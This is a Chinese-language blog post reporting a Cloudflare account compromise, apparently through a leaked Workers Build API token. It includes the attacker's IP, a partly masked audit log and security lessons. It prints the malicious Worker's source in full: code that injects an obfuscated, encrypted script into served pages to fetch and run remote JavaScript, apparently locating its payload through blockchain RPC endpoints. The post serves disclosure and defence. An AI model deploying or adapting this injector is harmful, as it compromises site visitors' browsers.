经过#

昨天访问我的站点，突然发现页面变成了 Error 1000，即反代源站为 Cloudflare 内部ip。

由于本站为部署在 Cloudflare Worker 的静态站点，并使用了 CNAME 优选，唯一可能的原因就是 Worker 的路由被删除。

在具体的 Worker 页面查看，确实，原本绑定 y-dev.tech/* 和www.y-dev.tech/* 的路由已经消失。但是我清楚地记得我没有删除！怎么回事呢？

重新尝试添加路由，发现提示：路由已被quiet-limit-xxxxx使用。看样子这是一个worker。点开一看，是一个没有绑定 Github 的 Worker，但是绑定了我大部分的业务子域名,甚至还有*y-dev.tech/*的路由。再看看代码，发现是被js注入了，向返回页面中添加了混淆且加密的恶意脚本

我当即删除了这个 Worker 并查看了我的账户审计日志，发现该 Worker的创建时间是我不在线的一天前的晚上12点，使用api授权并创建了多个 Worker路由，且操作时间并非集中在几秒钟内，判断为人工操作，操作来自ip 85.198.46.203。对ip的访问记录没有进一步的查询结果，且该ip被归为代理出口。

通过api这个信息，我查看了我的账户api token，并且发现了一个名叫(我的某个项目)-build-token但申请了几乎所有权限的api token，我当即进行了删除。出于保险起见我还重置了 Global API Key。

复盘#

为什么我能马上发现？#

歪打正着，我的站点本身就是部署在 Worker 上且使用路由的，在他修改路由时相当于删除了源站绑定导致请求直接流入 Cloudflare IP 出现错误，这才被察觉。

代码干了什么？#

假装无事发生，请求源站并返回页面，但是在返回的页面插入一个 script 块，里面写了混淆+加密的js，解密后是在客户端执行远程js代码。

有什么危害#

首先，在我不知情的情况创建 Worker、API Token几乎完全权限的情况下，他几乎可以对我的账户及域名进行任意操作。

其次，这个 Worker 本身设计是无感的且很难主动发现。

关于那个 API Token#

那个 Token 是 Cloudflare 进行绑定 Github 的 Worker Build 必须的，是自动生成的，且默认情况下整个账户的 Worker 会使用同一 token。该 token 具有的相关权限：修改 Worker 代码，修改 Worker 路由，修改账户设置等。具体参见 Cloudflare的文档：

The API token in Workers Builds defines the access granted to Workers Builds for interacting with your account’s resources. Currently, only user tokens are supported, with account-owned token support coming soon.

When you select Create new token, a new API token will be created automatically with the following permissions:

Account: Account Settings (read), Workers Scripts (edit), Workers KV Storage (edit), Workers R2 Storage (edit) Zone: Workers Routes (edit) for all zones on the account User: User Details (read), Memberships (read) You can configure the permissions of this API token by navigating to My Profile > API Tokens for user tokens.

It is recommended to consistently use the same API token across all uploads and deployments of your Worker to maintain consistent

由于我并没有在任何地方引用这些 token ，有极大概率是近期泛滥的 npm 投毒导致的。

启示？#

API Token 保管好！！！设置 ip 限制和权限限制！！及时更新你的 npm 包！具体来说可以把 Build Token 确认不需要的权限要删除。为保安全，也建议多关注一下安全事件，及时整改。

完整资源#

完整审计日志#

Time	ID	Action	Success	Actor Type	Actor ID	Actor IP	Owner ID	Resource Type	Resource ID	Metadata
2026-04-21T14:28:39Z	79edfc84-…	route_update	TRUE	user	47311258	85.198.46.203	7fe8******84e9	route	bd5768dc…	{“actor_email”:“o****e@outlook.com”,“pattern”:“previewapi./”,“script_name”:“quiet-limit-d8c3”,“zone_name”:""}
2026-04-21T14:28:33Z	e8ba2671-…	route_update	TRUE	user	47311258	85.198.46.203	7fe8******84e9	route	fdf4c171…	{“actor_email”:“o****e@outlook.com”,“pattern”:“ftp./”,“script_name”:“quiet-limit-d8c3”,“zone_name”:""}
2026-04-21T14:28:27Z	29dbea2a-…	route_update	TRUE	user	47311258	85.198.46.203	7fe8******84e9	route	3b765f82…	{“actor_email”:“o****e@outlook.com”,“pattern”:“odview./”,“script_name”:“quiet-limit-d8c3”,“zone_name”:""}
2026-04-21T14:28:22Z	8a6af94b-…	route_update	TRUE	user	47311258	85.198.46.203	7fe8******84e9	route	5c70b3f5…	{“actor_email”:“o****e@outlook.com”,“pattern”:“previewfront./”,“script_name”:“quiet-limit-d8c3”,“zone_name”:""}
2026-04-21T14:28:17Z	fdc121a5-…	route_update	TRUE	user	47311258	85.198.46.203	7fe8******84e9	route	86945d38…	{“actor_email”:“o****e@outlook.com”,“pattern”:“www./”,“script_name”:“quiet-limit-d8c3”,“zone_name”:""}
2026-04-21T14:28:12Z	e02023e0-…	route_update	TRUE	user	47311258	85.198.46.203	7fe8******84e9	route	9f89412d…	{“actor_email”:“o****e@outlook.com”,“pattern”:“dl./”,“script_name”:“quiet-limit-d8c3”,“zone_name”:""}
2026-04-21T14:28:05Z	209f14c6-…	route_update	TRUE	user	47311258	85.198.46.203	7fe8******84e9	route	900b9c63…	{“actor_email”:“o****e@outlook.com”,“pattern”:“esw./”,“script_name”:“quiet-limit-d8c3”,“zone_name”:""}
2026-04-21T14:27:58Z	32c587dd-…	route_update	TRUE	user	47311258	85.198.46.203	7fe8******84e9	route	e07701a8…	{“actor_email”:“o****e@outlook.com”,“pattern”:“esw2./”,“script_name”:“quiet-limit-d8c3”,“zone_name”:""}
2026-04-21T14:27:49Z	533b0984-…	route_update	TRUE	user	47311258	85.198.46.203	7fe8******84e9	route	e59e0207…	{“actor_email”:“o****e@outlook.com”,“pattern”:“cdn.od.ftp./”,“script_name”:“quiet-limit-d8c3”,“zone_name”:""}
2026-04-21T14:26:05Z	9774bae0-…	route_create	TRUE	user	47311258	85.198.46.203	7fe8******84e9	route	40732509…	{“actor_email”:“o*****e@outlook.com”,“pattern”:”/”,“script_name”:“quiet-limit-d8c3”,“zone_name”:""}
2026-04-21T14:25:21Z	4cfc8f60-…	route_create	TRUE	user	47311258	85.198.46.203	7fe8******84e9	route	0717a5e3…	{“actor_email”:“o*****e@outlook.com”,“pattern”:”/”,“script_name”:“quiet-limit-d8c3”,“zone_name”:""}
2026-04-21T14:24:26Z	3c59b765-…	script_deploy	TRUE	user	47311258	85.198.46.203	7fe8******84e9	script	quiet-limit-d8c3	{“actor_email”:“o*****e@outlook.com”,“deployment_id”:“8c1e3aa4-…“}
2026-04-21T14:24:26Z	ed3fb854-…	script_update	TRUE	user	47311258	85.198.46.203	7fe8******84e9	script	quiet-limit-d8c3	{“actor_email”:“o*****e@outlook.com”,“script_tag”:“1843d5a6…”,“version_id”:“ada07faa-…“}
2026-04-21T14:23:41Z	ccf69a4b-…	script_on_subdomain	TRUE	user	47311258	85.198.46.203	7fe8******84e9	script	quiet-limit-d8c3	{“actor_email”:“o*****e@outlook.com”}
2026-04-21T14:23:39Z	0a19ec74-…	script_deploy	TRUE	user	47311258	85.198.46.203	7fe8******84e9	script	quiet-limit-d8c3	{“actor_email”:“o*****e@outlook.com”,“deployment_id”:“8ac5a4ed-…“}
2026-04-21T14:23:39Z	c7e30b68-…	script_create	TRUE	user	47311258	85.198.46.203	7fe8******84e9	script	quiet-limit-d8c3	{“actor_email”:“o*****e@outlook.com”,“script_tag”:“1843d5a6…”,“version_id”:“92b8684e-…“}
2026-04-21T14:23:10Z	71f8c893-…	route_delete	TRUE	user	47311258	85.198.46.203	7fe8******84e9	route	77dacf0b…	{“actor_email”:“o****e@outlook.com”,“pattern”:“esm./”,“zone_name”:""}
2026-04-21T14:21:44Z	0dadecf5-…	login	TRUE	user	4903******62a6	85.198.46.203	4903******62a6	account	4903******62a6	{“actor_email”:“o*****e@outlook.com”}

Worker 原代码#

1
export default {
2
  async fetch(request) {
3
    const response = await fetch(request);
4
    const contentType = response.headers.get("content-type");
5

6
    if (contentType && contentType.includes("text/html")) {
7
      let html = await response.text();
8

9
      const yourScript = `<script>
10
(function(){var _0x47e122=32;var _0x0b6624='CEZVTkNUSU9OCAlbKgdVU0UAU1RSSUNUBxsqSUYIVFlQRU9GAFdJTkRPVx0dHQdVTkRFRklORUQHXFxUWVBFT0YARE9DVU1FTlQdHR0HVU5ERUZJTkVEB1xcV0lORE9XDn9/Ynd/c2NyaXB0f2luaXRpYWxpemVkf38JUkVUVVJOGypXSU5ET1cOf39id39zY3JpcHR/aW5pdGlhbGl6ZWR/fx1UUlVFGypDT05TVABsb2NhbH9zdG9yYWdlf2tleR0HU0lURX9SRVBBSVJ/U1RBVEUHGypDT05TVABsZWdhY3l/c3RvcmFnZX9rZXkdB0JXDURPV05MT0FERUQHGypDT05TVABkZWZhdWx0f3Nob3d/ZGVsYXkdERAQEBsqQ09OU1QAaGFuZGxlcn9leHBvcnQdB39/Ynd/bW9kZX9ydW5/fwcbKkNPTlNUAG1vZGV/ZmlsZX9tYXAdWypCUk9XU0VSGgdWEQ5KUwcMKkZPTlQaB1YSDkpTBwwqUkVDQVBUQ0hBGgdWEw5KUwcMKkJTT0QaB1YUDkpTBwwqU0lMRU5UGgdWFQ5KUwcMKkNMT1VERkxBUkUaB1YWDkpTBwwqQ0Z/VVBEQVRFGgdWFw5KUwcMKk1BQ39SRUNBUFRDSEEaB1YYDkpTBwwqTUFDf0NMT1VERkxBUkUaB1YZDkpTBypdGypDT05TVABjb250cmFjdH9jb25maWcdWypycGN/aG9zdHMaewJIVFRQUxoPD1JQQw1NQUlOTkVUDk1BVElDDlFVSUtOT0RFDlBSTwIMAkhUVFBTGg8PUlBDDkFOS1IOQ09ND1BPTFlHT04CDAJIVFRQUxoPD1BPTFlHT04NUFVCTElDDk5PRElFUw5BUFACDAJIVFRQUxoPD1BPTFlHT04NTUFJTk5FVA5QVUJMSUMOQkxBU1RBUEkOSU8CDAJIVFRQUxoPDxFSUEMOSU8PTUFUSUMCDAJIVFRQUxoPD1BPTFlHT04ORFJQQw5PUkcCDAJIVFRQUxoPD1BPTFlHT04OR0FURVdBWQ5URU5ERVJMWQ5DTwIMAkhUVFBTGg8PR0FURVdBWQ5URU5ERVJMWQ5DTw9QVUJMSUMPUE9MWUdPTgIMAkhUVFBTGg8PUE9MWUdPTg1NQUlOTkVUDkdBVEVXQVkOVEFUVU0OSU8CDAJIVFRQUxoPD1BPTFlHT04O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U0UJUkVUVVJOBwcbKlRSWVsqQ09OU1QAUVMdTkVXAHVybHNFQVJDSHBBUkFNUwhQQVJBTVNcXFtdCQ5UT3NUUklORwgJGypDT05TVABLRVkdSEVYdE9iWVRFUwhhcGl/cRJ/a2V5f2hleAkbKklGCEtFWQYGVFlQRU9GAHVJTlQYYVJSQVkBHR0HVU5ERUZJTkVEBwlbKkNPTlNUAE5PTkNFHU5FVwB1SU5UGGFSUkFZCBgJGypJRghUWVBFT0YAQ1JZUFRPAR0dB1VOREVGSU5FRAcGBkNSWVBUTw5HRVRyQU5ET012QUxVRVMJWypDUllQVE8OR0VUckFORE9NdkFMVUVTCE5PTkNFCRsqXUVMU0VbKkZPUghMRVQASR0QG0kcTk9OQ0UOTEVOR1RIG0kLCwlOT05DRXtJfR0IbUFUSA5SQU5ET00ICQoSFRYJBhIVFRsqXSpDT05TVABFTkMdCFRZUEVPRgB0RVhUZU5DT0RFUgEdHQdVTkRFRklORUQHCR9ORVcAdEVYVGVOQ09ERVIICRpOVUxMGypDT05TVABQTEFJTmJZVEVTHUVOQx9FTkMORU5DT0RFCFFTCRoIRlVOQ1RJT04ICVsqQ09OU1QAQVJSHU5FVwB1SU5UGGFSUkFZCFFTDkxFTkdUSAkbKkZPUghMRVQASR0QG0kcUVMOTEVOR1RIG0kLCwlBUlJ7SX0dUVMOQ0hBUmNPREVhVAhJCQYSFRUbKlJFVFVSTgBBUlIbKl0JCAkbKkNPTlNUAEtFWW1BVB1ORVcAdUlOVBhhUlJBWQhLRVkOTEVOR1RIC05PTkNFDkxFTkdUSAkbKktFWW1BVA5TRVQIS0VZDBAJGypLRVltQVQOU0VUCE5PTkNFDEtFWQ5MRU5HVEgJGypDT05TVABDSVBIRVJiWVRFUx1SQxQIS0VZbUFUDFBMQUlOYllURVMJGypDT05TVABQQVlMT0FEHU5FVwB1SU5UGGFSUkFZCE5PTkNFDkxFTkdUSAtDSVBIRVJiWVRFUw5MRU5HVEgJGypQQVlMT0FEDlNFVAhOT05DRQwQCRsqUEFZTE9BRA5TRVQIQ0lQSEVSYllURVMMTk9OQ0UOTEVOR1RICRsqQ09OU1QAUEFDS0VEHUJZVEVTdE9iFhR1UkwIUEFZTE9BRAkbKklGCFBBQ0tFRAlbKlJFVFVSTgBBUEliQVNFCwcPQVBJD0lOREVYDlBIUB9RHQcLUEFDS0VEGypdKl0qUkVUVVJOBwcbKl1DQVRDSAhFCVsqUkVUVVJOBwcbKl0qXSpBU1lOQwBGVU5DVElPTgBERUNSWVBUYVBJZU5WRUxPUEUIT0JKDFNDT1BFCVsqVFJZWypJRggBT0JKXFxUWVBFT0YAT0JKAR0dB09CSkVDVAcJUkVUVVJOAE9CShsqSUYIVFlQRU9GAE9CSg5RAR0dB1NUUklORwdcXAFPQkoOUQlSRVRVUk4AT0JKGypDT05TVABTQUZFc0NPUEUdCFRZUEVPRgBTQ09QRR0dHQdTVFJJTkcHBgYPfntBDVoQDRl/fVsRDBEWXQQPSQ5URVNUCFNDT1BFCQkfU0NPUEUaB0NGRwcbKkNPTlNUAEJBU0VrRVkdSEVYdE9iWVRFUwhhcGl/cRJ/a2V5f2hleAkbKklGCAFCQVNFa0VZCVJFVFVSTgBPQkobKklGCE9CSg5FTkMdHR0HR0NNEQcJWypUUllbKkNPTlNUAFBBQ0tFRB1CFhRVUkx0T2JZVEVTCE9CSg5RCRsqSUYIAVBBQ0tFRFxcUEFDS0VEDkxFTkdUSBwIERILERYLEQkJVEhST1cATkVXAGVSUk9SCAdHQ01/UEFDS0VEBwkbKkNPTlNUAElWHVBBQ0tFRA5TTElDRQgQDBESCRsqQ09OU1QAQ0lQSEVSd0lUSHRBRx1QQUNLRUQOU0xJQ0UIERIJGypDT05TVABHQ01sQUJFTB1TQUZFc0NPUEULB1xHQ00RBxsqQ09OU1QATEFCRUwdCFRZUEVPRgB0RVhUZU5DT0RFUgEdHQdVTkRFRklORUQHCR9ORVcAdEVYVGVOQ09ERVIICQ5FTkNPREUIR0NNbEFCRUwJGghGVU5DVElPTggJWypDT05TVABTHUdDTWxBQkVMGypDT05TVABBUlIdTkVXAHVJTlQYYVJSQVkIUw5MRU5HVEgJGypGT1IITEVUAEkdEBtJHFMOTEVOR1RIG0kLCwlBUlJ7SX0dUw5DSEFSY09ERWFUCEkJBhIVFRsqUkVUVVJOAEFSUhsqXQkICRsqQ09OU1QAS0VZYllURVMdQVdBSVQAU0hBEhUWYllURVMIQ09OQ0FUYllURVMIQkFTRWtFWQxMQUJFTAkJGypJRggBS0VZYllURVMJVEhST1cATkVXAGVSUk9SCAdHQ01/S0VZBwkbKklGCFRZUEVPRgBDUllQVE8dHR0HVU5ERUZJTkVEB1xcAUNSWVBUTw5TVUJUTEVcXAFDUllQVE8OU1VCVExFDklNUE9SVGtFWQlUSFJPVwBORVcAZVJST1IIB0dDTX9TVUJUTEUHCRsqQ09OU1QAQ1JZUFRPa0VZHUFXQUlUAENSWVBUTw5TVUJUTEUOSU1QT1JUa0VZCAdSQVcHDEtFWWJZVEVTDFtOQU1FGgdhZXMNZ2NtB10MRkFMU0UMewdERUNSWVBUB30JGypDT05TVABQTEFJTmJVRh1BV0FJVABDUllQVE8OU1VCVExFDkRFQ1JZUFQIW05BTUUaB2Flcw1nY20HDElWGklWDFRBR2xFTkdUSBoREhhdDENSWVBUT2tFWQxDSVBIRVJ3SVRIdEFHCRsqQ09OU1QASlNPTh1CWVRFU3RPdVRGGAhORVcAdUlOVBhhUlJBWQhQTEFJTmJVRgkJGypSRVRVUk4AanNvbg5QQVJTRQhKU09OCRsqXUNBVENICEUJWypJRghUWVBFT0YAT0JKDlESHR0dB1NUUklORwcGBk9CSg5REglbKkNPTlNUAFBBQ0tFRBIdQhYUVVJMdE9iWVRFUwhPQkoOURIJGypJRghQQUNLRUQSBgZQQUNLRUQSDkxFTkdUSB4dGQlbKkNPTlNUAE5PTkNFHVBBQ0tFRBIOU0xJQ0UIEAwYCRsqQ09OU1QAQ0lQSEVSEh1QQUNLRUQSDlNMSUNFCBgJGypDT05TVABLRVltQVQdTkVXAHVJTlQYYVJSQVkIQkFTRWtFWQ5MRU5HVEgLTk9OQ0UOTEVOR1RICRsqS0VZbUFUDlNFVAhCQVNFa0VZDBAJGypLRVltQVQOU0VUCE5PTkNFDEJBU0VrRVkOTEVOR1RICRsqQ09OU1QAUExBSU5iWVRFUxIdUkMUCEtFWW1BVAxDSVBIRVISCRsqQ09OU1QASlNPThIdQllURVN0T3VURhgIUExBSU5iWVRFUxIJGypSRVRVUk4AanNvbg5QQVJTRQhKU09OEgkbKl0qXSpSRVRVUk4AT0JKGypdKl0qSUYIT0JKDkVOQx0dHQdREgcJWypDT05TVABQQUNLRUQdQhYUVVJMdE9iWVRFUwhPQkoOUQkbKklGCAFQQUNLRURcXFBBQ0tFRA5MRU5HVEgcGQlSRVRVUk4AT0JKGypDT05TVABOT05DRR1QQUNLRUQOU0xJQ0UIEAwYCRsqQ09OU1QAQ0lQSEVSHVBBQ0tFRA5TTElDRQgYCRsqQ09OU1QAS0VZbUFUHU5FVwB1SU5UGGFSUkFZCEJBU0VrRVkOTEVOR1RIC05PTkNFDkxFTkdUSAkbKktFWW1BVA5TRVQIQkFTRWtFWQwQCRsqS0VZbUFUDlNFVAhOT05DRQxCQVNFa0VZDkxFTkdUSAkbKkNPTlNUAFBMQUlOYllURVMdUkMUCEtFWW1BVAxDSVBIRVIJGypDT05TVABKU09OHUJZVEVTdE91VEYYCFBMQUlOYllURVMJGypSRVRVUk4AanNvbg5QQVJTRQhKU09OCRsqXSpSRVRVUk4AT0JKGypdQ0FUQ0gIRQlbKlJFVFVSTgBPQkobKl0qXSpUUllbKldJTkRPVw5/f0JXZEVDUllQVGFQSWVOVkVMT1BFHURFQ1JZUFRhUEllTlZFTE9QRRsqXUNBVENICEUJW10qTEVUAFNIT1dkRUxBWR1kZWZhdWx0f3Nob3d/ZGVsYXkbKkxFVABNT0RFHQdCUk9XU0VSBxsqRlVOQ1RJT04ARkVUQ0h3SVRIdElNRU9VVAhVUkwMT1BUSU9OUwxUSU1FT1VUbVMJWypDT05TVABDT05UUk9MTEVSHU5FVwBhQk9SVGNPTlRST0xMRVIICRsqQ09OU1QAVElNRU9VVGlEHVNFVHRJTUVPVVQICAkdHkNPTlRST0xMRVIOQUJPUlQICQxUSU1FT1VUbVNcXBUQEBAJGypDT05TVABPUFRTHW9CSkVDVA5BU1NJR04IW10MT1BUSU9OU1xcW10MW1NJR05BTBpDT05UUk9MTEVSDlNJR05BTF0JGypSRVRVUk4ARkVUQ0gIVVJMDE9QVFMJDkZJTkFMTFkICAkdHkNMRUFSdElNRU9VVAhUSU1FT1VUaUQJCRsqXSpBU1lOQwBGVU5DVElPTgBGRVRDSGpTT053SVRIdElNRU9VVAhVUkwMT1BUSU9OUwxUSU1FT1VUbVMJWypDT05TVABSRVNQHUFXQUlUAEZFVENId0lUSHRJTUVPVVQIVVJMDE9QVElPTlMMVElNRU9VVG1TCRsqSUYIAVJFU1AOT0sJVEhST1cATkVXAGVSUk9SCAdIVFRQfwcLUkVTUA5TVEFUVVMJGypSRVRVUk4AQVdBSVQAUkVTUA5KU09OCAkbKl0qRlVOQ1RJT04AREVDT0RFaEVYc1RSSU5HCEhFWAlbKlRSWVsqTEVUAFJFU1VMVB0HBxsqRk9SCExFVABJHRAbSRxIRVgOTEVOR1RIG0kLHRIJWypDT05TVABCWVRFc1RSSU5HHUhFWA5TVUJTVFIISQwSCRsqQ09OU1QAQllURR1QQVJTRWlOVAhCWVRFc1RSSU5HDBEWCRsqSUYIQllURR4QCVJFU1VMVAsdc1RSSU5HDkZST01jSEFSY09ERQhCWVRFCRsqXSpSRVRVUk4AUkVTVUxUGypdQ0FUQ0gIRQlbKlJFVFVSTgcHGypdKl0qRlVOQ1RJT04AREVDT0RFckVTVUxUCFJFU1VMVAlbKlRSWVsqQ09OU1QASEVYZEFUQR1SRVNVTFQOU1RBUlRTd0lUSAgHEFgHCR9SRVNVTFQOU1VCU1RSCBIJGlJFU1VMVBsqSUYISEVYZEFUQQ5MRU5HVEgcERIYCVJFVFVSTgcHGypDT05TVABMRU5HVEhoRVgdSEVYZEFUQQ5TVUJTVFIIFhQMFhQJGypDT05TVABMRU5HVEgdUEFSU0VpTlQITEVOR1RIaEVYDBEWCRsqSUYITEVOR1RIHhAGBkhFWGRBVEEOTEVOR1RIHh0REhgLTEVOR1RIChIJWypDT05TVABTVFJJTkdoRVgdSEVYZEFUQQ5TVUJTVFIIERIYDExFTkdUSAoSCRsqUkVUVVJOAERFQ09ERWhFWHNUUklORwhTVFJJTkdoRVgJGypdKlJFVFVSTgcHGypdQ0FUQ0gIRQlbKlJFVFVSTgcHGypdKl0qQVNZTkMARlVOQ1RJT04AUE9TVGpTT053SVRIdElNRU9VVAhVUkwMQk9EWQxUSU1FT1VUbVMJWypSRVRVUk4AQVdBSVQARkVUQ0hqU09Od0lUSHRJTUVPVVQIVVJMDFsqTUVUSE9EGgdwb3N0BwwqSEVBREVSUxpbKgdjT05URU5UDXRZUEUHGgdBUFBMSUNBVElPTg9KU09OBwwqB2FDQ0VQVAcaB0FQUExJQ0FUSU9OD0pTT04HKl0MKkJPRFkaanNvbg5TVFJJTkdJRlkIQk9EWQkMKkNBQ0hFGgdOTw1TVE9SRQcqXQxUSU1FT1VUbVMJGypdKkFTWU5DAEZVTkNUSU9OAEdFVHVSTGZST01jT05UUkFDVAgJWypDT05TVABEQVRBZklFTEQdBxBYBwtjb250cmFjdH9jb25maWcOZnVuY3Rpb25/c2VsZWN0b3IbKkNPTlNUAFBBUkFNUx17W1RPGmNvbnRyYWN0f2NvbmZpZw5jb250cmFjdH9hZGRyZXNzDERBVEEaREFUQWZJRUxEXQwHTEFURVNUB30bKkNPTlNUAFJFUVVFU1RiT0RZHVtKU09OUlBDGgcSDhAHDE1FVEhPRBoHRVRIf0NBTEwHDFBBUkFNUwxJRBoRXRsqRk9SCExFVABBVFRFTVBUHRAbQVRURU1QVBwIY29udHJhY3R/Y29uZmlnDm1heH9yZXRyaWVzXFwRCRtBVFRFTVBUCwsJWypGT1IIQ09OU1QARU5EUE9JTlQAT0YIY29udHJhY3R/Y29uZmlnDnJwY39ob3N0c1xce30JCVsqVFJZWypDT05TVABEQVRBHUFXQUlUAFBPU1RqU09Od0lUSHRJTUVPVVQIRU5EUE9JTlQMUkVRVUVTVGJPRFkMY29udHJhY3R/Y29uZmlnDnRpbWVvdXR/bXNcXBUQEBAJGypJRghEQVRBBgZEQVRBDlJFU1VMVAlbKkNPTlNUAERPTUFJTh1ERUNPREVyRVNVTFQIREFUQQ5SRVNVTFQJGypJRghET01BSU4GBkRPTUFJTg5MRU5HVEgeEAlbKkxFVABVUkwdRE9NQUlODlRSSU0ICRsqSUYIAVVSTA5TVEFSVFN3SVRICAdIVFRQBwkJVVJMHQdIVFRQUxoPDwcLVVJMGypSRVRVUk4AVVJMGypdKl0qXUNBVENICEUJW10qXSpdKlJFVFVSTgBOVUxMGypdKkZVTkNUSU9OAFVQREFURXVSTFMIQkFTRXVSTAlbKklGCAFCQVNFdVJMCVJFVFVSThsqUEFORUxiQVNFdVJMHUJBU0V1